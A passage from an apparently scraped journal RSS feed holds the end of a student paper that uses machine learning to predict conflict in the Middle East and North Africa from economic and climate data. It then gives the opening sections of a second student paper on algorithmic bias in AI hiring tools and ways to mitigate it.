<p>Figure 3 provides additional context to Figures 1 and 2. It illustrates that the majority of conflicts in the MENA region during the 2010s were civil wars, whereas foreign wars appeared to become more prevalent in the 2020s. While the relationship is not definitive, there seems to be a stronger correlation between the unstable economic conditions in Sudan and Syria and the prevalence of civil wars. Although it is challenging to determine causality, the fluctuating GDP per capita in both countries throughout the 2010s may have contributed to economic instability, potentially triggering civil unrest, coups, and internal conflicts. While it remains difficult to draw firm conclusions, the 2020s appear to be a period of relative economic stability. This, combined with a notable increase in temperatures, may have prompted both nations and their affiliated groups to seek external resources before conditions could escalate further, thus reducing the risk of internal conflict. These factors may help explain the observed decrease in internal conflicts and the corresponding rise in foreign wars.</p>



<h2 class="wp-block-heading">5 Future Work</h2>



<p>Although this prediction model has already made some predictions based on the data points given to it, several improvements could streamline the process and produce more accurate results. Currently, all gathered data is treated and displayed as one large time series, with events from all areas of the region and all time periods grouped together, which makes accurate prediction harder. Just as importantly, relatively little data has been gathered to support these conclusions; an increased volume of data would allow the timeline to be split into smaller episodes and would decrease overfitting.</p>



<p>Another current problem is that the prediction model predicts the probability of events on a particular date solely from the information in a single preceding sliding window (with a binning interval of one week), disregarding the windows that came before it. The interval the model fixates on may not provide sufficient indications of conflict, while earlier windows could give context that helps the model predict events. An alternative would be an LSTM or another RNN, which would allow the model to account for the entire preceding history of the current episode.</p>
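


<p>As a rough illustration of that alternative, here is a hedged PyTorch sketch of an LSTM that consumes an entire episode of weekly feature rows and emits per-event probabilities; all sizes and inputs are invented.</p>



<pre class="wp-block-code"><code>import torch
import torch.nn as nn

class ConflictLSTM(nn.Module):
    def __init__(self, n_features=10, n_events=3, hidden=32):
        super().__init__()
        self.lstm = nn.LSTM(n_features, hidden, batch_first=True)
        self.head = nn.Linear(hidden, n_events)

    def forward(self, x):                 # x: (batch, weeks, n_features)
        out, _ = self.lstm(x)
        logits = self.head(out[:, -1])    # last hidden state summarizes history
        return torch.sigmoid(logits)      # independent per-event probabilities

model = ConflictLSTM()
episodes = torch.randn(4, 52, 10)         # 4 episodes of 52 weekly feature rows
print(model(episodes).shape)              # torch.Size([4, 3])</code></pre>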



<h2 class="wp-block-heading">6 Conclusion</h2>



<p>This paper explored the prediction of wars in the MENA region using statistics and machine learning. It identified causes of war, such as economic and climate factors, and analyzed papers on similar topics. The model was trained on various climate and economic data points and predicted outputs with varying degrees of accuracy. To obtain more accurate results, more data must be gathered. The successful development of this predictive model has significant implications for conflict prevention efforts. Early prediction of potential conflicts could enable intervention measures that mitigate their impact or prevent escalation, which could be particularly useful for humanitarian organizations and governments in conflict-prone regions. With more funding and focus, more accurate results could be achieved, minimizing unrest and conflict and increasing overall stability in the MENA region.</p>



<h2 class="wp-block-heading">7 Bibliography</h2>



<p>Lindsey, R., &amp; Dahlman, L. (2024, January 18). Climate Change: Global Temperature. Climate.gov; National Oceanic and Atmospheric Administration. https://www.climate.gov/news-features/understanding-climate/climate-change-global-temperature</p>



<p>WMO Climate Normals. (2021, July 8). National Centers for Environmental Information (NCEI). https://www.ncei.noaa.gov/products/wmo-climate-normals</p>



<p>Compilation of Geospatial Data (GIS) for the Mineral Industries and Related Infrastructure of Africa &#8211; ScienceBase-Catalog. (n.d.). Www.sciencebase.gov. <a href="https://www.sciencebase.gov/catalog/item/607611a9d34e018b3201cbbf">https://www.sciencebase.gov/catalog/item/607611a9d34e018b3201cbbf</a></p>



<p>Middle East &amp; North Africa | Data. (n.d.). Data.worldbank.org. https://data.worldbank.org/region/middle-east-and-north-africa?view=chart</p>



<p>World Economic Situation and Prospects: February 2020 Briefing, No. 134 | Department of Economic and Social Affairs. (2020). Un.org. https://www.un.org/development/desa/dpad/publication/world-economic-situation-and-prospects-february-2020-briefing-no-134/</p>



<p>Business In The Middle East: Cultural Differences You Need To Know. (2022, November 2). https://www.milestoneloc.com/business-in-the-middle-east/</p>



<p>Alex. (2015, June 9). Detailed Maps of the World’s Religions &#8211; Vivid Maps. Vivid Maps. https://vividmaps.com/maps-of-worlds-religions/</p>



<p>Poverty headcount ratio at $2.15 a day (2017 PPP) (% of population) &#8211; World | Data. (n.d.). Data.worldbank.org. https://data.worldbank.org/indicator/SI.POV.DDAY?locations=1W&amp;start=1984&amp;view=chart</p>



<p>Data. (2023). Resource Trade. https://resourcetrade.earth/?year=2022&amp;category=164&amp;units=value&amp;autozoom=1</p>



<p>Gu, D. (2019). Exposure and vulnerability to natural disasters for world’s cities (Technical Paper). United Nations Population Division. https://www.un.org/en/development/desa/population/publications/pdf/technical/TP2019-4.pdf</p>



<p>Herre, B., &amp; Arriagada, P. (2023). The Human Development Index and related indices: what they are and what we can learn from them. Our World in Data. https://ourworldindata.org/human-development-index</p>



<p>Burchell, K. (2020). Reporting, Uncertainty, and the Orchestrated Fog of War: A Practice-Based Lens for Understanding Global Media Events. International Journal of Communication. https://ijoc.org/index.php/ijoc/article/viewFile/11205/3102</p>



<p>World Bank. (2024). World Bank Group &#8211; International Development, Poverty and Sustainability. Worldbank.org. https://www.worldbank.org/ext/en/home</p>



<p>IMF. (2024). International Monetary Fund. IMF. https://www.imf.org/en/Home</p>



<p>Vision of Humanity | Destination for Peace. (n.d.). Vision of Humanity. https://www.visionofhumanity.org</p>



<p>National and Local Weather Radar, Daily Forecast, Hurricane and information from The Weather Channel and weather.com. (2019, March 7). The Weather Channel. https://weather.com/</p>



<p>Conflict Trends: A Global Overview, 1946–2023 &#8211; World | ReliefWeb. (2024, June 10). Reliefweb.int. https://reliefweb.int/report/world/conflict-trends-global-overview-1946-2023</p>



<p>Archie, A. (2022). World is seeing the greatest number of conflicts since the end of WWII, U.N. says. NPR. https://www.npr.org/1089884798/united-nations-conflict-covid-19-ukraine-myanmar-sudan-syria-yemen</p>



<p>Thegsaljournal. (2020, February 23). How has warfare changed since WWII? The GSAL Journal. https://thegsaljournal.com/2020/02/23/how-has-warfare-changed-since-wwii/</p>



<p>United Nations. (2020). A New Era of Conflict and Violence. United Nations. https://www.un.org/en/un75/new-era-conflict-and-violence</p>



<p>von Einsiedel, S. (2017). Civil War Trends and the Changing Nature of Armed Conflict. United Nations University. https://collections.unu.edu/eserv/UNU:6156/Civil_war_trends_UPDATED.pdf</p>



<p>Makarov, I. (2015). Statistical look at reasons of involvement in wars. arXiv. https://arxiv.org/pdf/1508.06228</p>



<p>Stewart, F. (2002). Root causes of violent conflict in developing countries. BMJ, 324(7333), 342–345. https://doi.org/10.1136/bmj.324.7333.342</p>



<p>Lemke, D., &amp; Cunningham, D. E. (2009, January 1). Distinctions Without Differences?: Comparing Civil and Interstate Wars. https://www.researchgate.net/publication/228191496_Distinctions_Without_Differences_Comparing_Civil_and_Interstate_Wars</p>



<p>Esfandiary, D. (2021, September 15). The Anxiety Effect: How 9/11 and Its Aftermath Changed Gulf Arab States’ Relations with the U.S. Crisis Group. www.crisisgroup.org/middle-east-north-africa/gulf-and-arabian-peninsula/united-arab-emirates-united-states-saudi-arabia</p>



<p>Kasliwal, N. (2025). FastEmbed. Qdrant. https://qdrant.github.io/fastembed/. Accessed 30 Mar. 2025.</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Albert Liu</h5><p>Albert is a junior at Jordan High School and is interested in data science, computer science, and history. Albert is part of his school&#8217;s Technology Student Association and robotics club, where he and his team have gone on to compete at the state and world levels. He particularly enjoys computer science contests and solving the problems associated with them, ranking Silver in the USACO competitions. </p> <p>Albert wishes to continue finding new solutions to old problems using data, ranging from simple questions, such as the correlation between a house&#8217;s interior and its price, to creating more accurate predictions for larger issues, such as famines, natural disasters, conflicts, and when they may occur.


</p></figure></div>
<p>The post <a href="https://exploratiojournal.com/determining-the-likelihood-of-war-in-a-country-in-the-middle-east-and-north-africa-based-on-economic-and-climate-data-via-machine-learning/">Determining the Likelihood of War in a Country in the Middle East and North Africa Based on Economic and Climate Data via Machine Learning</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Fair or Flawed? How Algorithmic Bias is Redefining Recruitment and Inclusion</title>
		<link>https://exploratiojournal.com/fair-or-flawed-how-algorithmic-bias-is-redefining-recruitment-and-inclusion/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=fair-or-flawed-how-algorithmic-bias-is-redefining-recruitment-and-inclusion</link>
		
		<dc:creator><![CDATA[Sanaa Gada]]></dc:creator>
		<pubDate>Sun, 17 Nov 2024 22:05:48 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<category><![CDATA[Engineering]]></category>
		<category><![CDATA[Social Sciences]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4026</guid>

					<description><![CDATA[<p>Sanaa Gada<br />
Lynbrook High School</p>
<p>The post <a href="https://exploratiojournal.com/fair-or-flawed-how-algorithmic-bias-is-redefining-recruitment-and-inclusion/">Fair or Flawed? How Algorithmic Bias is Redefining Recruitment and Inclusion</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Sanaa Gada<br><strong>Mentor</strong>: Dr. Hong Pan<br><em>Lynbrook High School</em></p>
</div></div>



<h2 class="wp-block-heading">Abstract </h2>



<p>In a world where artificial intelligence is beginning to shape critical life decisions, can we trust that the algorithms guiding these choices are unbiased? This paper investigates the implications of algorithmic bias in hiring processes, emphasizing the dual role of artificial intelligence (AI) as both a transformative tool for recruitment and a potential perpetrator of discrimination. It begins with a review of current hiring practices and then identifies key factors contributing to algorithmic bias, including data quality issues, algorithmic opacity, and the influence of proxy variables. Notable cases where biases have emerged, including Amazon&#8217;s recruitment algorithm, which favored male candidates due to biased training data, are carefully examined. The paper outlines various strategies for mitigating algorithmic bias while acknowledging their limitations, such as data augmentation, vector space correction, and blind hiring. Furthermore, the research extends its analysis beyond hiring, exploring the manifestations of algorithmic bias in facial recognition technology, predictive policing, and healthcare, thus illustrating the broader societal implications. In conclusion, the paper advocates for creating strong frameworks and legislation to promote more openness and responsibility when using algorithms, underscoring society’s moral obligation to ensure technology serves all communities equitably in an increasingly automated world.</p>



<h2 class="wp-block-heading">Key Terms </h2>



<p><span style="text-decoration: underline;">Algorithmic bias</span>:‬‭ systematic and repeatable errors‬‭ in a computer system that create unfair outcomes </p>



<p><span style="text-decoration: underline;">Applicant Tracking System (ATS)</span>:‬‭ a software system‬‭ that helps organizations manage the hiring and recruiting process </p>



<p><span style="text-decoration: underline;">Artificial Intelligence (AI)</span>:‬‭ computer software systems that are capable of performing tasks traditionally associated with human intelligence</p>



<p><span style="text-decoration: underline;">Proxy Variables</span>:‬‭ a variable that serves as a substitute‬‭ for the variable of interest that cannot be measured directly </p>



<p><span style="text-decoration: underline;">Target Variable:‬‭</span> a feature of a dataset needing to‬‭ be understood more clearly </p>



<h2 class="wp-block-heading">1. Introduction </h2>



<p>Today’s businesses focus more on finding the right employees to maintain their competitive edge. To achieve this, many companies are turning to artificial intelligence (AI) embedded within applicant tracking systems (see Key Terms) to streamline hiring processes, enhance efficiency, and reduce workloads. However, while AI offers significant advantages, it can also unintentionally perpetuate discrimination in hiring. This occurs when biased algorithms or data lead to unfair treatment of certain candidates (see Figure 1). Resources like the Implicit Association Test, available at https://implicit.harvard.edu/implicit/takeatest.html, can be valuable tools to help individuals recognize and explore their biases. Understanding the causes of discrimination in hiring is not just crucial; it&#8217;s a responsibility we all share for developing fairer and more inclusive employment practices.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="896" height="552" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.49.44 PM.png" alt="" class="wp-image-4028" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.49.44 PM.png 896w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.49.44 PM-300x185.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.49.44 PM-768x473.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.49.44 PM-230x142.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.49.44 PM-350x216.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.49.44 PM-480x296.png 480w" sizes="(max-width: 896px) 100vw, 896px" /><figcaption class="wp-element-caption">Figure 1:‬‭ A pie chart displaying the various causes‬‭ of discrimination in the hiring process, highlighting how algorithmic bias, characterized by systematic and repeatable errors, significantly contributes to inequality techniques in hiring. Hiring discrimination prevents minority groups from accessing fair job opportunities and limits career growth (Albaroudi et al., A, 2024). </figcaption></figure>



<p>This paper will first explore the current job hiring process, some of the key issues that lead to algorithmic bias in the status quo, and real-world examples of hiring bias. Possible solutions for mitigating these biases will also be evaluated, acknowledging current limitations but highlighting ongoing advancements and future potential. Finally, general applications of algorithmic decision-making across various fields will be explored, demonstrating the breadth of these tools and the significance of addressing biases to create a fairer, more inclusive future for all.</p>



<h2 class="wp-block-heading">2. Navigating AI-Driven Hiring </h2>



<h4 class="wp-block-heading">2.1 Applicant Tracking Systems </h4>



<p>Applicant tracking systems, otherwise known as ATS, have become increasingly common in hiring practices. Websites embed this software system to help recruiters filter candidates throughout the hiring process, improving applicant sourcing. When candidates apply to a job posting by sharing their resumes, an ATS will scan candidates based on qualifying questions that satisfy the company’s standards (see Figure 2). AI plays a crucial role in this process, scanning resumes based on specific parameters regarding skills, qualifications, experiences, etc. It takes over the tedious human task of shortlisting candidate resumes, but algorithms may have encoded societal stereotypes found in the data they were trained with (Frissen et al., 2023).</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="512" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-1024x512.png" alt="" class="wp-image-4029" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-1024x512.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-300x150.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-768x384.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-1000x500.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-230x115.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-350x175.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM-480x240.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.50.27 PM.png 1344w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 2:‬‭ Applicant tracking systems are used to parse‬‭ resumes after candidates apply, removing unqualified applicants by scanning for relevant keywords and matching qualifications. These algorithms are becoming an integral part of modern hiring processes, helping companies efficiently manage large volumes of applications and improve the overall recruitment workflow (Sen, 2023‬‭ ). </figcaption></figure>



<h4 class="wp-block-heading">2.2 Three Factors Contributing to Algorithmic Bias </h4>



<p>Algorithmic bias is shaped by several key factors, beginning with data quality issues. These issues arise when the training data used to develop algorithms is biased, incomplete, or reflective of historical inequalities. For instance, if data is collected from an organization that has historically disproportionately hired more white employees than Black employees, the algorithm might associate good performance with being white. This does not mean that hiring only Black employees would fix the bias; instead, it&#8217;s crucial to improve the diversity and balance of the data to reduce the bias. The urgency of this need cannot be overstated. Proxy variables (see Key Terms) can also embed systemic biases within algorithms even when direct indicators of discrimination, such as race and gender, are not explicitly included. For example, zip code can be a proxy variable for race because it strongly correlates with neighborhood segregation (Fountain, 2022).</p>



<p>Another significant factor contributing to algorithmic bias is algorithmic opacity. This term refers to the potential lack of understanding of an algorithm due to its complexity. Often, the lack of transparency in an algorithm makes it hard for human users to interpret its internal processes (Sadek et al., 2024). Many algorithms operate as “black boxes,” meaning their decision-making processes are not easily understandable or interpretable by those affected by their outcomes. If the logic behind decisions is unclear, it becomes challenging to identify or correct biases, ensure fairness, or hold the creators accountable for discriminatory outcomes.</p>



<p>Algorithms also rely on correlating variables with a target variable (see Key Terms) to predict outcomes. For example, if a tech company was looking to hire a software developer proficient in a specific programming language such as Python, the target variable could be &#8220;proficiency in Python.&#8221; The recruitment algorithm would then categorize candidates into groups based on their coding skills, such as &#8220;expert in Python,&#8221; &#8220;basic Python knowledge,&#8221; &#8220;no Python experience,&#8221; etc. This allows the company to narrow the pool of candidates to those who match the technical expertise required for the job.</p>



<p>However, a key problem with target variables is that how the output is defined will influence the result. For example, suppose non-technical skills (soft skills) are considered important for an organization and are part of the target variable. In that case, women may gain an advantage compared to algorithms that do not consider such skills. Additionally, the measure of employees’ performance is also based on subjective assessments by their managers. Factors such as the employee-manager relationship, personal biases, or differing expectations within the team environment can feed into the algorithmic evaluation. As a result, algorithms trained on this data may unintentionally reflect biases present in the workplace, resulting in unfair outcomes where high-performing individuals who fit the requirements might be overlooked or undervalued by the algorithm.</p>



<h4 class="wp-block-heading">2.3 Current Hiring Practices </h4>



<p>AI has played a growing role in hiring, transforming how companies identify, evaluate, and recruit talent. Early AI-driven hiring systems made the hiring process more efficient but lacked sophisticated methodologies. For example, Resumix was founded in 1988 and served as a resume parsing tool. ATS made its debut in the 1990s with job posting sites such as CareerBuilder. By the early 2000s, talent assessment tools like eSkill and SkillSurvey used AI to automate pre-employment testing and background/skill checks. The 2010s saw the rise of AI-powered video interviewing software, with platforms like HireVue utilizing machine learning algorithms. Natural language processing (NLP), a subfield of AI that uses machine learning to understand spoken and written human language, is used to analyze speech patterns, word choice, and language structure during video interviews to assess candidates. Sentiment analysis provides insights into candidates’ emotions and engagement, adding another layer to talent evaluation.</p>



<p>However, AI’s integration into hiring has led to concerns about bias. A Microsoft research study in 2019 highlighted significant biases in AI algorithms, embedded through the data on which they are trained. Researchers found that language models like Word2Vec, a machine learning technique that uses NLP to obtain vector representations of words, could produce biased associations between specific demographic groups and stereotypical terms. For example, their investigation observed outputs such as “man is to woman as computer programmer is to homemaker” (Chiu, n.d.). These biases pose risks in applications like resume screening, where hidden associations could unintentionally favor or disadvantage certain groups.</p>
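


<p>Such associations can be reproduced directly with off-the-shelf tools. The following hedged sketch, assuming the gensim package and its downloadable GoogleNews Word2Vec vectors, poses the analogy by vector arithmetic; results vary by model and version.</p>



<pre class="wp-block-code"><code>import gensim.downloader as api

# Loads the pretrained GoogleNews vectors (a large one-time download).
vectors = api.load("word2vec-google-news-300")

# Solve "man is to computer_programmer as woman is to ?" by vector arithmetic.
print(vectors.most_similar(positive=["woman", "computer_programmer"],
                           negative=["man"], topn=3))</code></pre>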



<p>In 2018, Amazon’s AI-driven algorithm was also found to be biased. When AI systems are trained on historical data, they often reflect the existing biases within that data. If a company’s past hiring practices were skewed, those biases could be unintentionally embedded in the AI’s decision-making process. When Amazon attempted to automate its recruitment process in 2018, it used an algorithm trained on the previous 10 years of resumes. The dataset of resumes consisted primarily of male applicants over ten years, causing the algorithm to favor male language patterns and resulting in discrimination against female candidates (Dastin, 2022). Words such as “executed” and “captured” were commonly found on male engineers’ resumes and were more favored by the technology. The system also downgraded resumes that featured the word &#8220;women&#8217;s,&#8221; such as in &#8220;women&#8217;s chess club captain.&#8221; This example highlights the potential risks of relying on AI in hiring, as biased training data can perpetuate discrimination and undermine diversity efforts.</p>



<figure class="wp-block-image aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="868" height="486" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.52.06 PM.png" alt="" class="wp-image-4030" style="width:548px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.52.06 PM.png 868w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.52.06 PM-300x168.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.52.06 PM-768x430.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.52.06 PM-230x129.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.52.06 PM-350x196.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.52.06 PM-480x269.png 480w" sizes="(max-width: 868px) 100vw, 868px" /><figcaption class="wp-element-caption">Figure 3:‬‭ Different applications of AI in job hiring. The most common usages of AI are talent sourcing, such as career websites and candidate outreach, and candidate screening, which includes resume scanning and identifying skills that match the job description (The Ultimate Guide to AI in Recruiting, 2024). </figcaption></figure>



<p>While Amazon&#8217;s algorithm faced scrutiny for discriminating against women, it also prompted broader questions about how personal data is utilized in hiring. Companies increasingly rely on AI algorithms to sift through resumes, assess candidates, and predict job performance (see Figure 3). This reliance raises crucial considerations regarding the transparency and accountability of data usage in recruitment processes. Globally, regulatory approaches to AI in hiring are evolving. The European Union has taken the lead in establishing AI policy with its AI Act, which aims to ensure that AI hiring systems follow strict privacy rules. It mandates transparency in AI decision-making and imposes requirements for assessing the impact of AI on employment outcomes (Sadek et al., 2024).</p>



<p>In the U.S., the rules for AI are less organized and vary from place to place. With general agreement that AI policies are needed, the question becomes: who will make the rules? A commonly shared point of view is that frameworks must ensure that company technologies do not cause harm and that companies are held accountable for their impacts. Furthermore, policies need to advocate for greater transparency, including how AI systems work and the data they use. Actors in the AI space must adopt principles that promote responsible AI use, as articulated in the White House’s Blueprint for an AI Bill of Rights (The Three Challenges of AI Regulation, n.d.).</p>



<p>As AI technology advances, the need for coherent frameworks will become increasingly important to ensure fairness and accountability in employment practices. </p>



<h2 class="wp-block-heading">3. Solutions and Limitations of Mitigating Algorithmic Bias in Hiring </h2>



<p>As algorithms play a more significant role in hiring, techniques like data augmentation, vector space correction, and blind hiring offer valuable ways to enhance fairness and inclusivity (see Figure 4). While each method brings its own limitations, they represent significant strides toward reducing bias in AI-driven recruitment. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="530" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-1024x530.png" alt="" class="wp-image-4031" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-1024x530.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-300x155.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-768x398.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-1000x518.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-230x119.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-350x181.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM-480x249.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.53.13 PM.png 1240w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 4:‬‭ An overview of three possible solutions‬‭ to mitigating algorithmic bias. Data augmentation expands the training data by incorporating diverse examples to reduce bias and improve model fairness. See Figure 5 for an in-depth model of augmentation for text-based data. Vector space correction adjusts how data points are represented in a multi-dimensional space by positioning them more fairly in relation to biased concepts, helping to equalize their influence in the model. Blind hiring removes identifiable information like names or genders from applications to prevent unconscious biases during recruitment. </figcaption></figure>



<h4 class="wp-block-heading">3.1 Data Augmentation </h4>



<p><span style="text-decoration: underline;">Definition</span>: Data augmentation involves using existing training data and modifying it to create new instances that enhance machine learning model training. This technique helps address the issue of insufficient data by artificially increasing the volume, quality, and diversity of training data (Mumuni &amp; Mumuni, 2022).</p>



<p><span style="text-decoration: underline;">Mechanism</span>:‬‭ Common data augmentation methods for images include rotating, flipping, or cropping. For text data or data used in hiring practices, data augmentation techniques include synonym replacement, paraphrasing, and numerically variating data (see Figure 5). </p>



<p><span style="text-decoration: underline;">Advantages</span>:‬‭ Augmenting data increases the diversity‬‭ of the training dataset, allowing models to generalize unseen data better. Expanding a dataset also helps reduce overfitting, where a model memorizes the training data rather than learning its underlying patterns. Data augmentation allows a model to recognize patterns, increasing its ability to handle real-world variations.</p>



<p><span style="text-decoration: underline;">Limitations</span>:‬‭ However, augmented data may not always reflect real-world scenarios, potentially leading to overfitting if the modifications are not representative. Extreme data augmentation can introduce excess and unimportant information, deteriorating a model’s quality‬‭ (Walidamamou, 2023)‬‭ . </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="532" src="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-1024x532.png" alt="" class="wp-image-4032" srcset="https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-1024x532.png 1024w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-300x156.png 300w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-768x399.png 768w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-1000x519.png 1000w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-230x119.png 230w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-350x182.png 350w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM-480x249.png 480w, https://exploratiojournal.com/wp-content/uploads/2024/11/Screenshot-2024-11-17-at-9.54.37 PM.png 1152w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Figure 5:‬‭ A visual demonstration of an augmented dataset‬‭ where data is generated using information derived from the original training set. The available examples are diversified through slight variations, such as synonym replacement, slight paraphrasing, and numerical variations. They are combined with the original data to create a more diverse data set. </figcaption></figure>



<h4 class="wp-block-heading">3.2 Vector Space Correction </h4>



<p><span style="text-decoration: underline;">Definition</span>:‬‭ The vector space is a mathematical framework in which data points, such as words and images, are represented as vectors in a multidimensional space. Vector space correction helps mitigate biases by equalizing the distance between the protected attributes (such as race or gender) and the biased concept‬‭ (Albaroudi et al., 2024)‬‭ . See Figure 4 for a simplified visual demonstration. </p>



<p><span style="text-decoration: underline;">Mechanism</span>:‬‭ The process involves adjusting the positions‬‭ of vectors to reduce biases. For example, if a vector model leans towards associating white people with better skills and qualifications, the vector space correction technique will associate the same skills and qualifications with Black people. </p>



<p><span style="text-decoration: underline;">Advantages</span>:‬‭ This technique helps create a more balanced‬‭ representation of different groups, which can reduce the impact of biased data on model predictions. </p>



<p><span style="text-decoration: underline;">Limitations</span>:‬‭ Vector space correction can cause semantic drift, where adjustments in the vector space may unintentionally change the meanings and relationships of the data points. This can lead to inaccurate predictions and misinterpretations of ideas, making it harder for algorithms to accurately reflect real-world scenarios. Another limitation of this approach is that biases related to more than one attribute are hard to correct because many factors need to be considered before rearranging the vector space. </p>



<h4 class="wp-block-heading">3.3 Blind Hiring </h4>



<p><span style="text-decoration: underline;">Definition</span>:‬‭ Blind hiring is a recruitment strategy‬‭ that aims to eliminate bias by removing personal information from decision-making systems. Personal information such as names, zip codes, and health records can sometimes be indicators of social class, gender, age, or racial background. </p>



<p><span style="text-decoration: underline;">Mechanism‬‭</span> : This technique focuses on evaluating candidates‬‭ based solely on their skills and qualifications, removing the chances of being unconsciously influenced in hiring decisions. </p>



<p><span style="text-decoration: underline;">Advantages‬‭</span> : One advantage of blind hiring is that‬‭ it promotes diversity by allowing candidates from varied backgrounds to compete on an equal footing. Ultimately, this practice can lead to a more inclusive workplace culture overall. </p>



<p><span style="text-decoration: underline;">Limitations‬‭</span> : While blind hiring practices aim to eliminate visible identifiers, such as names and genders, they do not fully address the underlying gender, racial, or social biases in the hiring process. This is because specific keywords can still influence perceptions and decisions, as they carry implicit biases that favor one group over another, regardless of the removal of direct identifiers (see Figure 6). For example, masculine traits typically include characteristics like confidence and competitiveness, whereas feminine traits often encompass emotional qualities like warmth, supportiveness, and collaboration‬‭ (Albaroudi et al., 2024)‬‭ . </p>



